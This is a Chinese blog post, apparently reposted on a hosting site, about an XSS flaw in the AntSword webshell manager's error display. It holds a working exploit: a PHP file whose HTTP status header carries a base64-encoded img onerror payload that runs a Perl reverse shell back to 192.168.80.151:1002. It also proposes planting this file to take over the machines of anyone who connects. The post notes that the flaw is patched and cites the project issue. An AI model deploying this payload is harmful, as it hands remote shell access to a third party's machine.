溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

蟻劍xss漏洞,獲取者shell

發(fā)布時(shí)間:2020-05-25 05:16:23 來源:網(wǎng)絡(luò) 閱讀:4803 作者:菜鵝小生 欄目:安全技術(shù)

今日在github上看到蟻劍暴露了一個(gè)xss漏洞,自己也經(jīng)常使用蟻劍。同時(shí)在freebuf上也有一篇文章,關(guān)于蟻劍漏洞的。閑著沒事測(cè)試了一波。

一、漏洞成因

蟻劍shell遠(yuǎn)程連接失敗時(shí),蟻劍會(huì)返回錯(cuò)誤信息,但因?yàn)槭褂玫氖莌tml解析,導(dǎo)致xss漏洞。

用過蟻劍的童靴都清楚,當(dāng)我們遠(yuǎn)程連接寫好的webshell的時(shí)候,有時(shí)候可能因?yàn)閟hell書寫錯(cuò)誤或者鏈接填寫不當(dāng)?shù)臅r(shí)候,會(huì)出現(xiàn)大堆的錯(cuò)誤代碼。
蟻劍xss漏洞,獲取者shell

該信息并沒有進(jìn)行 XSS 保護(hù),因此能夠利用 js 調(diào)用 perl 便可反彈***者的shell

很多時(shí)候我們不去注意,但這里恰恰就是漏洞利用點(diǎn)。(漏洞往往就在你的眼皮地下,你只要向下看看就能找到。可惜我們只向前看,不向下看。)

二、漏洞驗(yàn)證

鑒于本人對(duì)js沒有深入了解,只懂得些皮毛。這里就直接引用別人寫好的shell了

(1)驗(yàn)證xss漏洞的存在

<?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>');?>

蟻劍xss漏洞,獲取者shell

Head()函數(shù),向客戶端發(fā)送原始的 HTTP 報(bào)頭。
當(dāng)蟻劍遠(yuǎn)程連接shell的時(shí)候就會(huì)觸發(fā)彈框。

(2)反彈***者shell

require('child_process').exec('perl -e \'use Socket;$i="192.168.80.151";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });

將這些代碼進(jìn)行base64加密

cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7

構(gòu)造header

<?php

header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())'>");
?>

將其寫入被***中的網(wǎng)站目錄下
蟻劍xss漏洞,獲取者shell

被***機(jī)監(jiān)聽1002端口
蟻劍xss漏洞,獲取者shell

***機(jī)蟻劍遠(yuǎn)程連接

蟻劍xss漏洞,獲取者shell

獲得***者shell
蟻劍xss漏洞,獲取者shell

在最新的版本中, 修改了 toastr 可以輸出 html 的特點(diǎn),以后均不支持輸出 html。建議及時(shí)更新到最新版本

三、總結(jié)

如果你檢測(cè)到了自己被上傳了webshell,不妨可以試一試這個(gè)漏洞,對(duì)方如果使用的是蟻劍,當(dāng)對(duì)方連接你的時(shí)候,也是他上線的時(shí)候?;蛘咴诒荣悾▃hen shi)環(huán)境的時(shí)候,故意制造一個(gè)這樣的shell,誘惑一些小可愛連一下。

參考鏈接:
https://github.com/AntSwordProject/antSword/issues/147

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI